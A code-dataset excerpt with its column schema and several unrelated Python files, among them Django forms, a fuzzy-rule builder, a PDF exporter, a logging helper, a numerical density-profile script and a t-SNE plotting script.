repo_name
stringlengths 7
111
| __id__
int64 16.6k
19,705B
| blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 5
151
| content_id
stringlengths 40
40
| detected_licenses
list | license_type
stringclasses 2
values | repo_url
stringlengths 26
130
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringlengths 4
42
| visit_date
timestamp[ns] | revision_date
timestamp[ns] | committer_date
timestamp[ns] | github_id
int64 14.6k
687M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 12
values | gha_fork
bool 2
classes | gha_event_created_at
timestamp[ns] | gha_created_at
timestamp[ns] | gha_updated_at
timestamp[ns] | gha_pushed_at
timestamp[ns] | gha_size
int64 0
10.2M
⌀ | gha_stargazers_count
int32 0
178k
⌀ | gha_forks_count
int32 0
88.9k
⌀ | gha_open_issues_count
int32 0
2.72k
⌀ | gha_language
stringlengths 1
16
⌀ | gha_archived
bool 1
class | gha_disabled
bool 1
class | content
stringlengths 10
2.95M
| src_encoding
stringclasses 5
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 10
2.95M
| extension
stringclasses 19
values | num_repo_files
int64 1
202k
| filename
stringlengths 4
112
| num_lang_files
int64 1
202k
| alphanum_fraction
float64 0.26
0.89
| alpha_fraction
float64 0.2
0.89
| hex_fraction
float64 0
0.09
| num_lines
int32 1
93.6k
| avg_line_length
float64 4.57
103
| max_line_length
int64 7
931
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
nathaniel-prog/sofproject | 13,271,448,962,479 | 5247e956398d4b20df00b4120da5c9f4a445d049 | ac23a4af430f92868ce1bd0c7571fe78e9ba6ffe | /routs/forms.py | a0b52541879a68b813b1cba669fd3c822099bfcc | []
| no_license | https://github.com/nathaniel-prog/sofproject | 52501ba050b3cf5dd10911fd283bee323dce491c | 16fedf099f1e5e63883ea6a1a01965b9a3fd0ba5 | refs/heads/master | 2023-02-07T22:11:11.671001 | 2020-12-30T09:23:30 | 2020-12-30T09:23:30 | 294,345,213 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from bemember.forms import PersonForm
from media.images.forms import HotelForm , AppartForm
from django import forms
from bemember.models import Post
from routs.models import Town
class CommentForm(forms.Form):
    """Plain (non-model) form for submitting a comment: a name and a body."""
    # The 'class' attr customises the CSS class of the rendered <input>.
    name = forms.CharField(widget=forms.TextInput(attrs={'class': 'special'}))
    # NOTE(review): 'size' is not a standard <textarea> attribute -- 'rows'/'cols'
    # may have been intended; confirm against the template that renders this.
    comment = forms.CharField(widget=forms.Textarea(attrs={'size': '40'}))
class PostForm(forms.ModelForm):
    """Model-backed form for creating/editing Post objects.

    The original subclassed ``forms.Form``, whose metaclass ignores the inner
    ``Meta`` entirely, so the form rendered no fields at all.  ``ModelForm``
    is required for ``model``/``fields`` to take effect (TownForm in this
    module already does this correctly).
    """
    class Meta:
        model = Post
        fields = ['titre', 'author', 'body', 'post_date', 'likes']
class TownForm(forms.ModelForm):
    """Model form exposing only a Town's name."""
    class Meta:
        model=Town
        fields = ['name']
| UTF-8 | Python | false | false | 610 | py | 74 | forms.py | 45 | 0.67541 | 0.672131 | 0 | 27 | 21.111111 | 78 |
Nevada228/simple-fuzzy-example | 13,211,319,452,387 | 77a0c0230864d28f5a1a06ba08f1b10c073c3d0e | bfd58743308912a57e28f9dafa231b656cc0986c | /utils.py | 71c88b42c9595760338b2221c4fe24ddce28a935 | []
| no_license | https://github.com/Nevada228/simple-fuzzy-example | 367d6acfe155692d54a27bac6736607fd96066cf | a6b5bec51ae3db252530731aeba5f5876fd881c6 | refs/heads/master | 2021-03-18T19:40:27.740760 | 2020-03-17T09:38:13 | 2020-03-17T09:38:13 | 247,095,238 | 1 | 1 | null | false | 2020-03-17T09:38:15 | 2020-03-13T14:51:49 | 2020-03-15T12:44:46 | 2020-03-17T09:38:14 | 3 | 1 | 1 | 0 | Python | false | false | from skfuzzy import control as ctrl
from constants import *
class RuleBuilder:
    """Helper for assembling skfuzzy control rules from antecedent terms."""

    @staticmethod
    def build_rule(antecedents, consequent, response: ResponseEnum, req_quality: list):
        """Build a fuzzy rule that ANDs one quality term per antecedent.

        Arguments:
            antecedents -- fuzzy antecedent variables, one per requirement.
            consequent -- fuzzy consequent variable; its ``response`` term is used.
            response -- which consequent term the rule should activate.
            req_quality -- chosen quality (enum with a ``name``) for each
                requirement; must have exactly one entry per item in REQUIREMENTS.

        Raises:
            ValueError -- if ``req_quality`` does not match REQUIREMENTS in length.
        """
        if len(req_quality) != len(REQUIREMENTS):
            # The original raised a bare Exception with a non-descriptive,
            # non-English message; a ValueError with context is clearer and is
            # still caught by any caller handling Exception.
            raise ValueError(
                "req_quality must contain exactly one entry per requirement "
                f"({len(req_quality)} given, {len(REQUIREMENTS)} expected)"
            )

        # AND together antecedent[quality] for every (antecedent, quality) pair.
        # The original wrapped this in a broad ``except Exception`` that only
        # printed and continued, which could pass rule_body=None into
        # ctrl.Rule; letting the error propagate surfaces failures at the source.
        rule_body = None
        for antecedent, quality in zip(antecedents, req_quality):
            term = antecedent[quality.name]
            rule_body = term if rule_body is None else rule_body & term

        return ctrl.Rule(rule_body, consequent[response.name])
| UTF-8 | Python | false | false | 694 | py | 4 | utils.py | 4 | 0.585799 | 0.585799 | 0 | 19 | 34.578947 | 87 |
jvastbinder/tinyhands | 18,683,107,756,209 | 93f6e5d5a1b3d097dd77ddd3d6221f39402ae349 | 201922e0451af60aa97b217e08b67f2ce461d657 | /application/budget/pdfexports/mdf_exports.py | 438cf9dbecfcf80b9c23785b50efcf9ec04e4e3b | []
| no_license | https://github.com/jvastbinder/tinyhands | d79b9d53bbdab2c105399c5710c0a81568544743 | a5b9e7fb22c9074c39993ed58d3a840fd3c87ad4 | refs/heads/master | 2020-03-15T02:23:55.355383 | 2018-03-16T21:01:24 | 2018-03-16T21:01:24 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from budget.pdfexports.pdf_creator import BasePDFCreator
from budget.helpers import MoneyDistributionFormHelper
import zipfile
from io import BytesIO
class MDFExporter(BasePDFCreator):
    """Renders a single Money Distribution Form (MDF) as a PDF."""

    template_name = 'budget/MoneyDistributionTemplateV2.rml'

    def __init__(self, mdf_id):
        """Prime the PDF creator with the template and the data for ``mdf_id``."""
        data = self.get_mdf_data(mdf_id)
        super(MDFExporter, self).__init__(self.template_name, data)

    def get_mdf_data(self, mdf_id):
        """Collect the template context for one MDF via the form helper."""
        helper = MoneyDistributionFormHelper(mdf_id)
        data = {}
        data['name'] = helper.station_name
        data['date'] = helper.date_entered
        data['sections'] = helper.sections
        data['total'] = helper.total
        return data
class MDFBulkExporter():
    """Bundles the MDF PDFs for several budgets into one in-memory ZIP archive."""

    def __init__(self, budgets):
        # Budgets whose MDFs should be exported; each must provide mdf_file_name().
        self.budgets = budgets

    def create(self):
        """Return a BytesIO containing a ZIP archive with one PDF per budget."""
        output = BytesIO()
        # ``with`` guarantees the archive is finalized and closed even if a
        # single PDF export raises part-way through (the original leaked the
        # open ZipFile on error).
        with zipfile.ZipFile(output, 'w') as mdf_zip:
            for budget in self.budgets:
                pdf = MDFExporter(budget).create()
                mdf_zip.writestr(budget.mdf_file_name(), pdf.getvalue())
        return output
| UTF-8 | Python | false | false | 1,060 | py | 45 | mdf_exports.py | 39 | 0.630189 | 0.629245 | 0 | 36 | 28.444444 | 88 |
misakimeidaisuki/ganid-livedns-update | 10,368,051,076,797 | 897fbb024f766a541f9478741498c5676d84c524 | 75824d946d271fa7ef6c446b858872dd4e903185 | /update_log.py | 9514b471138165d281773c4bd629a8956eea9efa | [
"MIT"
]
| permissive | https://github.com/misakimeidaisuki/ganid-livedns-update | 3cd0a55ecce7471b1441c6841a88edf1a5110d2b | eda8a474a1b896ff6cd9e5f8ecf973e56ce9841f | refs/heads/master | 2020-04-23T15:00:22.316081 | 2019-02-18T15:12:51 | 2019-02-18T15:12:51 | 171,250,205 | 1 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import os
import logging
class updateLog(object):
    """Thin wrapper around :mod:`logging` that logs to both a file and the console.

    NOTE(review): handlers are attached to the *root* logger (``getLogger()``
    with no name), so constructing several ``updateLog`` instances duplicates
    every message -- confirm single-instance usage or switch to a named logger.
    """

    def __init__(self, filename="update.log", level=logging.DEBUG):
        """Configure the root logger with a file handler and a console handler.

        Keyword arguments:
            filename -- log file name, created next to this module (default "update.log").
            level -- minimum level for the logger and both handlers (default DEBUG).
        """
        self.__path = os.path.dirname(os.path.realpath(__file__))
        self.logger = logging.getLogger()
        self.logger.setLevel(level)

        # One shared formatter for both handlers, e.g.
        # "2020-01-01 12:00:00 - [INFO]:message".  ("format" was renamed to
        # avoid shadowing the builtin.)
        log_format = "%(asctime)s - [%(levelname)s]:%(message)s"
        date_format = "%Y-%m-%d %H:%M:%S"
        formatter = logging.Formatter(log_format, datefmt=date_format)

        # File handler: write the log next to this source file.
        filepath = os.path.join(self.__path, filename)
        file_handler = logging.FileHandler(filepath)
        file_handler.setLevel(level)
        file_handler.setFormatter(formatter)

        # Console handler mirrors the same records to the terminal.
        console_handler = logging.StreamHandler()
        console_handler.setLevel(level)
        console_handler.setFormatter(formatter)

        self.logger.addHandler(console_handler)
        self.logger.addHandler(file_handler)

    def debug(self, message):
        """Log *message* at DEBUG level."""
        self.logger.debug(message)

    def info(self, message):
        """Log *message* at INFO level."""
        self.logger.info(message)

    def warning(self, message):
        """Log *message* at WARNING level."""
        self.logger.warning(message)

    def setLevel(self, level):
        """Change the logger's minimum level (handler levels are unchanged)."""
        self.logger.setLevel(level)
| UTF-8 | Python | false | false | 1,126 | py | 7 | update_log.py | 5 | 0.64476 | 0.64476 | 0 | 35 | 31.171429 | 67 |
hotdl/python-tutorials | 10,376,641,036,460 | 2ad57e67cdffb511bca12336071cffabcfe5bd4a | 02f5833453289823eba6f532b8491cbfd977a048 | /base/number.py | d7c65b8035f2b6bd83b42d9dfa07f430a9fd8e21 | []
| no_license | https://github.com/hotdl/python-tutorials | 2fcbcdd41f6d6d4efe45a9c879a089ff32f3acbc | b78e15fc29b129275ed283208b97118c7cf4f554 | refs/heads/master | 2020-04-22T22:17:46.790396 | 2019-02-14T16:19:56 | 2019-02-14T16:19:56 | 170,702,886 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | if __name__ == "__main__":
print(2 + 2)
print(8 / 5)
print(8//5)
print(8 % 5)
print(8*2)
print(8**2)
print(8.0/2)
print(2 + 2J)
| UTF-8 | Python | false | false | 160 | py | 4 | number.py | 3 | 0.425 | 0.31875 | 0 | 9 | 16.777778 | 26 |
TedMusk/Python_Network_Programming | 11,321,533,836,681 | 2a07f09ec04d6f89cb727247d0402cec1c6e2c22 | d50351d70ffb0f0f0b828f7364f6253c87672a07 | /chapter01/search1.py | db09a61a9f911055ae401b502269d6ba5c01a436 | []
| no_license | https://github.com/TedMusk/Python_Network_Programming | c21c52f9be9b9b28cb699ca96def7c6728b25370 | b8e8f5cd9f080440b9f6bc0a916800cf2ed30277 | refs/heads/master | 2021-01-22T04:01:21.833530 | 2017-05-25T16:37:57 | 2017-05-25T16:37:57 | 92,421,208 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # coding: utf-8
'''
Created by Musk on 2017/5/26.
'''
from pygeocoder import Geocoder
if __name__ == '__main__':
    # NOTE(review): only the address is defined here; the Geocoder lookup that
    # the pygeocoder import suggests was never written -- presumably unfinished.
    address = 'HangZhou'
| UTF-8 | Python | false | false | 137 | py | 4 | search1.py | 2 | 0.620438 | 0.562044 | 0 | 9 | 14.222222 | 31 |
tom2rd/pylayers | 9,534,827,427,217 | bead71cfcbd55d1b308ffda209591a03e8dc8e12 | af1e443f06a50a2eda5cffbf72d9d692888e4d53 | /pylayers/gis/test/test_taoffice.py | ff8ad2742f44d16038167e00c4e49b630ac94e9f | [
"MIT",
"GPL-3.0-or-later"
]
| permissive | https://github.com/tom2rd/pylayers | 2a470cf9d3f9b793459dfccde83bfc5c24f08d1d | 84bdc924ae8055313b9ec833f0509000b0a30f45 | refs/heads/master | 2020-08-30T00:16:39.555371 | 2019-10-29T05:51:50 | 2019-10-29T05:51:50 | 218,210,476 | 0 | 0 | MIT | true | 2019-10-29T05:26:11 | 2019-10-29T05:26:11 | 2019-10-19T11:54:09 | 2019-10-22T22:44:38 | 795,400 | 0 | 0 | 0 | null | false | false | from pylayers.gis.layout import *
from pylayers.simul.link import *
# Load the TA-Office layout; force=True presumably rebuilds it from the .ini
# rather than using a cached structure -- confirm in the pylayers docs.
L = Layout('TA-Office.ini',force=True)
##L.build()
#plt.ion()
##L.showG('st',aw=True,labels=True,nodelist=L.ldiffout)
#f,lax= plt.subplots(2,2)
#L.showG('s',aw=True,labels=True,fig=f,ax=lax[0][0])
#lax[0][0].set_title('Gs',fontsize=18)
#L.showG('st',aw=True,labels=True,fig=f,ax=lax[0][1])
#lax[0][1].set_title('Gt',fontsize=18)
#L.showG('v',aw=True,labels=True,fig=f,ax=lax[1][0])
#lax[1][0].set_title('Gv',fontsize=18)
#L.showG('i',aw=True,labels=True,fig=f,ax=lax[1][1])
#lax[1][1].set_title('Gi',fontsize=18)
#
##DL = DLink(L=L)
##DL.a = np.array([-3,6.2,1.5])
##DL.eval(force=['sig','ray','Ct','H'],ra_vectorized=True,diffraction=True)
#
##DL.b = np.array([12.5,30,1.5])
| UTF-8 | Python | false | false | 745 | py | 313 | test_taoffice.py | 245 | 0.644295 | 0.593289 | 0 | 22 | 32.863636 | 75 |
OsAlex/algo_python | 5,695,126,652,084 | e7ab319977e407ee6d15c06483dc47a34be9b855 | 5402a5a5fbe3d958e808b846f18c68bc7698c7bf | /lesson_1/lesson_01_2.py | 7e51ae7ed927dc26f77924e382f84e4c20ecfe1c | []
| no_license | https://github.com/OsAlex/algo_python | 29507cac67c69a72725b7bafd84c61f254a9a655 | e8700af2fd89e133a08f4cb235b922e22995d8b2 | refs/heads/master | 2020-05-14T15:00:46.404602 | 2019-05-16T12:07:49 | 2019-05-16T12:07:49 | 181,844,462 | 0 | 0 | null | false | 2019-05-16T12:07:49 | 2019-04-17T07:59:20 | 2019-05-10T08:12:44 | 2019-05-16T12:07:49 | 165 | 0 | 0 | 1 | Python | false | false | # 2. Выполнить логические побитовые операции «И», «ИЛИ» и др. над числами 5 и 6.
# Выполнить над числом 5 побитовый сдвиг вправо и влево на два знака.
# Объяснить полученный результат.
i = 5 & 6
print('5 = ', bin(5),', 6 = ', bin(6), ', 5 & 6 = ', bin(i), ' = ', i)
i = 5 | 6
print('5 = ', bin(5),', 6 = ', bin(6), ', 5 | 6 = ', bin(i), ' = ', i)
i = 5 << 2
print('Print 5 << 2: ', bin(5), ' << 2 = ', bin(i), ' = ', i)
i = 5 >> 2
print('Print 5 >> 2: ', bin(5), ' >> 2 = ', bin(i), ' = ', i) | UTF-8 | Python | false | false | 638 | py | 32 | lesson_01_2.py | 31 | 0.481928 | 0.417671 | 0 | 15 | 32.266667 | 81 |
web8341/python-trading-robot | 14,705,968,065,446 | bff6799afd012a8300b13b86e24a10a25a413efa | 70bc9a1ffec4c3d7580b3280692a65890bdede05 | /pyrobot/robot.py | 707356de3e10a93b0c240edf06a97411c4370f4a | [
"MIT"
]
| permissive | https://github.com/web8341/python-trading-robot | 035401a6a8bd9bb840adb8d16a0d32b80455e212 | c10af5daae2e18119c0cecc5f250484624f5f548 | refs/heads/master | 2022-08-25T11:03:52.849313 | 2020-05-22T14:09:37 | 2020-05-22T14:09:37 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from td.client import TDClient
from datetime import datetime, time, timezone
from pyrobot.portfolio import Portfolio
from pyrobot.trades import Trade
class PyRobot():
    """Trading robot built on top of the TD Ameritrade API.

    Owns the authenticated API session and provides helpers for checking US
    equity market hours, creating a portfolio, and templating trade orders.
    """

    def __init__(self, client_id: str, redirect_uri: str, credentials_path: str = None, trading_account: str = None) -> None:
        """Initalizes a new instance of the robot and logs into the API platform specified.

        Arguments:
        ----
        client_id {str} -- The Consumer ID assigned to you during the App registration.
            This can be found at the app registration portal.

        redirect_uri {str} -- The redirect URL specified when the TD Ameritrade
            Application was created.

        Keyword Arguments:
        ----
        credentials_path {str} -- The path to the session state file used to prevent
            a full OAuth workflow. (default: {None})

        trading_account {str} -- Your TD Ameritrade account number. (default: {None})
        """
        # Set the attributes.
        self.trading_account: str = trading_account
        self.client_id: str = client_id
        self.redirect_uri: str = redirect_uri
        self.credentials_path: str = credentials_path
        self.session: TDClient = self._create_session()
        self.trades: dict = {}

    def _create_session(self) -> TDClient:
        """Start a new session.

        Creates a new session with the TD Ameritrade API and logs the user into
        the new session.

        Returns:
        ----
        TDClient -- A TDClient object with an authenticated session.
        """
        td_client = TDClient(
            client_id=self.client_id,
            redirect_uri=self.redirect_uri,
            credentials_path=self.credentials_path
        )

        # Log the client into the new session.
        td_client.login()

        return td_client

    @staticmethod
    def _now_in_utc_window(start_hour: int, start_minute: int, end_hour: int, end_minute: int) -> bool:
        """Return True if the current UTC time lies inside [start, end] (inclusive).

        Bug fix: the original methods used
        ``datetime.now().replace(tzinfo=timezone.utc)``, which labels the
        *local* wall-clock time as UTC and is therefore wrong on any machine
        whose clock is not already UTC; ``datetime.now(timezone.utc)`` yields
        the true current UTC time.
        """
        now = datetime.now(timezone.utc)
        window_start = now.replace(hour=start_hour, minute=start_minute, second=0, microsecond=0)
        window_end = now.replace(hour=end_hour, minute=end_minute, second=0, microsecond=0)
        return window_start <= now <= window_end

    @property
    def pre_market_open(self) -> bool:
        """Checks if pre-market is open (12:00 - 13:30 UTC).

        Returns:
        ----
        bool -- True if pre-market is open, False otherwise.
        """
        return self._now_in_utc_window(12, 0, 13, 30)

    @property
    def post_market_open(self) -> bool:
        """Checks if post-market is open (20:00 - 22:30 UTC).

        Returns:
        ----
        bool -- True if post-market is open, False otherwise.
        """
        return self._now_in_utc_window(20, 0, 22, 30)

    @property
    def regular_market_open(self) -> bool:
        """Checks if the regular market is open (13:30 - 20:00 UTC).

        Returns:
        ----
        bool -- True if the regular market is open, False otherwise.
        """
        return self._now_in_utc_window(13, 30, 20, 0)

    def create_portfolio(self) -> Portfolio:
        """Create a new portfolio.

        Creates a Portfolio Object to help store and organize positions
        as they are added and removed during trading.

        Returns:
        ----
        Portfolio -- A pyrobot.Portfolio object with no positions.
        """
        # Initalize the portfolio and keep a reference on the robot.
        self.portfolio = Portfolio(account_number=self.trading_account)

        return self.portfolio

    def create_trade(self, enter_or_exit: str, long_or_short: str, order_type: str = 'mkt', price: float = 0.0, stop_limit_price=0.0) -> Trade:
        """Initalizes a new instance of a Trade Object.

        This helps simplify the process of building an order by using pre-built
        templates that can be easily modified to incorporate more complex strategies.

        Arguments:
        ----
        enter_or_exit {str} -- `'enter'` to open a position, `'exit'` to close one.

        long_or_short {str} -- `'long'` to go long, `'short'` to go short.

        Keyword Arguments:
        ----
        order_type {str} -- Order template to use: `'mkt'`, `'lmt'`, `'stop'`,
            `'stop-lmt'` or `'trailing-stop'`. (default: {'mkt'})

        price {float} -- Price associated with the order: the stop price for
            `'stop'`/`'stop-lmt'` orders, the limit price for `'lmt'` orders,
            the market price for `'mkt'` orders. (default: {0.0})

        stop_limit_price {float} -- Limit price of a `'stop-lmt'` order; ignored
            for other order types. (default: {0.0})

        Returns:
        ----
        Trade -- A pyrobot.Trade object built from the specified template.
        """
        # Initalize a new trade object and fill in the requested template.
        trade = Trade()
        trade.new_trade(
            order_type=order_type,
            side=long_or_short,
            enter_or_exit=enter_or_exit,
            price=price,
            stop_limit_price=stop_limit_price
        )
        return trade

    def delete_trade(self):
        """Delete a trade from the robot. Not implemented yet."""
        # TODO(review): implement removal from self.trades; kept as a no-op so
        # existing callers keep working.
        pass

    def grab_current_quotes(self) -> dict:
        """Grabs the current quotes for all positions in the portfolio.

        Makes a single call to the TD Ameritrade Get Quotes endpoint with every
        symbol held in the portfolio.

        Returns:
        ----
        dict -- A dictionary keyed by symbol containing the quote for each position.
        """
        # First grab all the symbols currently held in the portfolio.
        symbols = self.portfolio.positions.keys()

        # Grab the quotes in one batched request.
        quotes = self.session.get_quotes(instruments=list(symbols))

        return quotes
| UTF-8 | Python | false | false | 11,780 | py | 7 | robot.py | 6 | 0.533531 | 0.525552 | 0 | 353 | 32.371105 | 145 |
lrj1197/Final-project- | 15,908,558,908,230 | 1e7b037665d9bde2800c0ded5f935a881916dd99 | d132e903498a9a893e810393cfe26074980f6730 | /Numerical_Part_1.py | f36e64236d5b28464d9801257ded2d8ec77f5442 | []
| no_license | https://github.com/lrj1197/Final-project- | 8ec85879d766d6c85b42f987c360d10c1b3f6621 | 097ed277d4d1c5ebf2657bbc1ab9bc68cc677fef | refs/heads/master | 2021-08-23T16:09:39.423842 | 2017-12-05T15:58:15 | 2017-12-05T15:58:15 | 112,251,216 | 0 | 1 | null | null | null | null | null | null | null | null | null | null | null | null | null | import numpy as np
import matplotlib.pyplot as plt
from scipy.integrate import *
from scipy import *
import scipy as sp
def Numerical():
alpha = 1
beta = 1
gamma = 1
Rho_0 = 1
Rs = 1
G = 1
params = [alpha,beta,gamma,Rho_0,Rs,G]
#define R as a linear space
R_min = 0.1
R_max = 60
R_step = 10000
R = np.linspace(R_min,R_max,R_step)
#define the density profile
Rho =Rho_0/ ((1+(R/Rs)**2)**(3/2))
#Rho_0/ ( (R/Rs)**gamma * (1+(R/Rs)**alpha)**((beta-gamma)/alpha) ) Somethings worng with this one
#Rho_0/ ((1+(R/Rs)**2)**(3/2)) works well
#Get Rho as a list
#Rho = Rho(R,params)
J = 2*np.pi*R #The Jacodian for the integral
U = J*Rho #the integrand
#print(U)
#Get the mass as a list
#requieres an integral
M = cumtrapz(U, x=R, dx = R_step, initial = 0)
#M = M(Rho,R,params)
#print M
V = np.sqrt((G*M)/R)
plt.figure
plt.plot(R,V)
plt.plot(R,U)
plt.plot(R,M)
plt.show()
if __name__ == '__main__':
    # The original guard compared __name__ against '__Numerical__' (which is
    # never true) and then called Numerical() unconditionally, so the demo
    # also ran on import; guard it properly instead.
    Numerical()
| UTF-8 | Python | false | false | 1,084 | py | 6 | Numerical_Part_1.py | 4 | 0.548893 | 0.520295 | 0 | 51 | 20.254902 | 102 |
python-gino/authlib-gino | 10,041,633,576,354 | b625785d449b301d15c70c24fc794fc3223a6f6a | 22e4d1987bac5079a0477bad7f149473299eebb5 | /src/authlib_gino/fastapi_session/gino_app.py | ec660e612669eb8af54e7de83aec110c586f4161 | []
| no_license | https://github.com/python-gino/authlib-gino | ced8cf69dd7b2faaa87ee2d59698fdcd89a145d6 | 94a8a104b4b5e1e6a369bbc94a952039fafffbf0 | refs/heads/master | 2023-04-21T05:05:51.576362 | 2020-09-04T21:51:07 | 2020-09-07T21:39:45 | 269,523,103 | 3 | 1 | null | false | 2021-05-13T20:47:58 | 2020-06-05T03:35:09 | 2020-09-07T21:39:49 | 2021-05-13T20:47:57 | 131 | 3 | 1 | 4 | Python | false | false | from importlib.metadata import entry_points
def load_entry_point(name, default_factory=None):
    """Load the ``gino.app`` entry point called *name*.

    Falls back to calling *default_factory* when no matching entry point is
    registered, and returns None when no factory is given either (the original
    unconditionally called ``default_factory()``, raising TypeError when the
    default of None was left in place).
    """
    eps = entry_points()
    try:
        # Python 3.10+: EntryPoints.select(); the dict-style .get() was
        # deprecated and removed in 3.12.
        group = eps.select(group="gino.app")
    except AttributeError:
        # Older Pythons return a mapping of group name -> entry points.
        group = eps.get("gino.app", [])
    for ep in group:
        if ep.name == name:
            return ep.load()
    return default_factory() if default_factory is not None else None
| UTF-8 | Python | false | false | 232 | py | 22 | gino_app.py | 20 | 0.642241 | 0.642241 | 0 | 8 | 28 | 49 |
igor-morawski/LL-tSNE | 10,033,043,626,416 | 8d6dc324061bba2dfb40b88878ae55b5c4d91802 | 97b5a35cbf48bf561084645e67a1ddccf115c4a6 | /tsne.py | 0d9573d5874a425ba555a32836511d0ba6073ae0 | []
| no_license | https://github.com/igor-morawski/LL-tSNE | 55202c226e5ef9068ad695ec219328936888a449 | b650e4062830f08f58690385f62cf3b82a4c8138 | refs/heads/main | 2023-06-25T10:23:15.263579 | 2021-07-23T11:26:24 | 2021-07-23T11:26:24 | 349,344,183 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # python tsne.py /tmp2/igor/LL-tSNE/features/S_R50_epoch_121-1.pkl --output_dir=tsne
# python tsne.py /tmp2/igor/LL-tSNE/features_manual/COCO_R50_epoch_1-1.pkl --output_dir=manual --lr=10 --perplexity=5
# https://towardsdatascience.com/how-to-tune-hyperparameters-of-tsne-7c0596a18868
import argparse
import tqdm
from PIL import Image
import glob
import os
import os.path as op
import pickle
import tqdm
import matplotlib.pyplot as plt
import matplotlib.patheffects as PathEffects
import matplotlib
from matplotlib.lines import Line2D
import numpy as np
import sklearn
from sklearn.manifold import TSNE
import seaborn as sns
# Shared t-SNE settings: a long optimisation (15000 iterations), a fixed seed
# for reproducibility, and PCA initialisation.
TSNE_DEFAULT = {"n_iter" : 3*5000, "random_state" : 3, "init":"pca"}
def scatter(x, colors, cats, alpha=1):
    """Scatter-plot 2-D embedded points coloured by class, with labels and a legend.

    Adapted from https://github.com/oreillymedia/t-SNE-tutorial

    Arguments:
        x -- (N, 2) array of embedded coordinates.
        colors -- (N,) array of integer class indices into ``cats``.
        cats -- ordered category names, one per class index.
        alpha -- opacity applied to every class colour. (default: 1)

    Returns:
        (figure, axes, scatter artist, list of label text artists)
    """
    # One RGB colour per category from seaborn, extended with a shared alpha
    # channel so every class is drawn at the same opacity.
    rgb_palette = np.array(sns.color_palette("hls", len(cats)))
    palette = np.c_[rgb_palette, alpha*np.ones(rgb_palette.shape[0])]

    # Create the scatter plot.
    f = plt.figure(figsize=(8, 8))
    ax = plt.subplot(aspect='equal')
    # Bug fix: np.int was removed in NumPy 1.24; the builtin int is the exact
    # equivalent (np.int was simply an alias for it).
    sc = ax.scatter(x[:,0], x[:,1], lw=0, s=40,
                    c=palette[colors.astype(int)])
    plt.xlim(-25, 25)
    plt.ylim(-25, 25)
    ax.axis('off')
    ax.axis('tight')

    # Add a numeric label at the median position of each class.
    txts = []
    for i in range(len(cats)):
        xtext, ytext = np.median(x[colors == i, :], axis=0)
        txt = ax.text(xtext, ytext, str(i), fontsize=24)
        txt.set_path_effects([
            PathEffects.Stroke(linewidth=5, foreground="w"),
            PathEffects.Normal()])
        txts.append(txt)

    # Custom legend mapping each colour to "category, (index)".
    legend_elements = [Line2D([0], [0], marker='o', color=palette[i], label="{}, ({})".format(cats[i], i),
                              markerfacecolor=palette[i], markersize=15) for i in range(len(cats))]
    ax.legend(handles=legend_elements, loc='lower right')
    return f, ax, sc, txts
def read_pickle(args):
    """Load pickled per-image feature maps and build the t-SNE input.

    Returns ``(x, y, cats)`` where ``x`` is the (B, C*H*W) matrix of
    per-channel-std-normalised features, ``y`` holds integer class indices
    and ``cats`` is the sorted tuple of category names.
    """
    features_list = []
    labels = []
    seen = set()

    # NOTE(review): pickle executes arbitrary code on load -- only open files
    # produced by the companion feature-extraction script.
    with open(args.pickled_features, "rb") as handle:
        samples = pickle.load(handle)

    for _, sample in tqdm.tqdm(enumerate(samples)):
        features = sample["features"]
        meta = sample["img_metas"]
        # Category name = first two "_"-separated tokens of the file name.
        category = "_".join(meta["ori_filename"].split("_")[:2])
        if args.cat and args.cat not in category:
            continue  # optional --cat substring filter
        seen.add(category)
        features_list.append(features)
        labels.append(category)

    cats = tuple(sorted(seen))
    for cat in cats:
        print(f"{cat} - {labels.count(cat)} samples")

    x = np.array(features_list)
    B, C, H, W = x.shape
    # Normalise each channel by its std over the batch and spatial axes
    # (numerically identical to the original per-channel loop).
    x /= x.std(axis=(0, 2, 3), keepdims=True)
    x = x.reshape(B, -1)

    y = np.hstack([cats.index(name) for name in labels])
    return x, y, cats
if __name__ == "__main__":
    # https://github.com/oreillymedia/t-SNE-tutorial
    # CLI: embed pickled features with t-SNE and save scatter plots.
    parser = argparse.ArgumentParser(description='')
    parser.add_argument('pickled_features')
    parser.add_argument('--output_dir', type=str)
    parser.add_argument('--lr', default=200, type=int)
    parser.add_argument('--perplexity', default=None, type=int)
    parser.add_argument('--cat', default=None, type=str)
    args = parser.parse_args()
    # Sanity-check the learning rate range before running.
    assert 1.0 <= args.lr <= 1000.0
    if not op.exists(args.output_dir):
        os.mkdir(args.output_dir)
    assert op.exists(args.output_dir)
    # Plots are written to <output_dir>/<pickle file name without extension>/.
    plot_dir = op.join(args.output_dir, op.split(args.pickled_features)[-1].split(".")[0])
    if not op.exists(plot_dir):
        os.mkdir(plot_dir)
    assert op.exists(plot_dir)
    x, y, cats = read_pickle(args)
    cat_prefix = "all" if not args.cat else args.cat
    # Sweep several perplexities unless one was pinned on the command line.
    perplexities = [args.perplexity] if args.perplexity else [10, 30, 50]
    for perplexity in perplexities:
        tsne = TSNE(learning_rate=args.lr, perplexity=perplexity, **TSNE_DEFAULT).fit_transform(x)
        scatter(tsne, y, cats, alpha=0.5)
        print(op.join(plot_dir, f"{cat_prefix}_p{perplexity}_lr{int(args.lr)}.png"))
        # Save both raster and vector versions of the current figure.
        plt.savefig(op.join(plot_dir, f"{cat_prefix}_p{perplexity}_lr{int(args.lr)}.png"))
        plt.savefig(op.join(plot_dir, f"{cat_prefix}_p{perplexity}_lr{int(args.lr)}.svg"))
| UTF-8 | Python | false | false | 4,384 | py | 12 | tsne.py | 11 | 0.617473 | 0.5974 | 0 | 117 | 36.358974 | 117 |
